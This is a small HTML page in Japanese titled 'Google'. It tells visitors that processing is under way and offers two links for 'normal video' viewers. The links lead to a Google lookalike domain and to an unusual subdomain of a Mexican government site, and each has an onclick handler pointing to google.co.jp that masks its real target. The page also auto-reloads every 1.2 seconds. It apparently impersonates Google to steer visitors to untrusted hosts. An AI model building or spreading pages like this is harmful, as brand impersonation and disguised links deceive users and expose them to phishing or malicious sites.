<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <title>Google</title>
    <style>
        body {
            text-align: center;
        }
    </style>
</head>
<body>
    処理中…<br>少しお待ちください<br><br>
    曲を聞きたいのでしたら、このまま処理をお待ちください…<br>
    普通の動画を見てるのであれば <a href="https://google.jp.reno.pe" onclick="window.location.href='https://google.co.jp'">こちら</a>または<a href="https://slim2-by-renren.panel-laboralcj.gob.mx/" onclick="window.location.href='https://google.co.jp'">こちら</a>でご覧ください…
    <script>setTimeout(function(){location.reload();},1200);</script>
</body>
</html> 
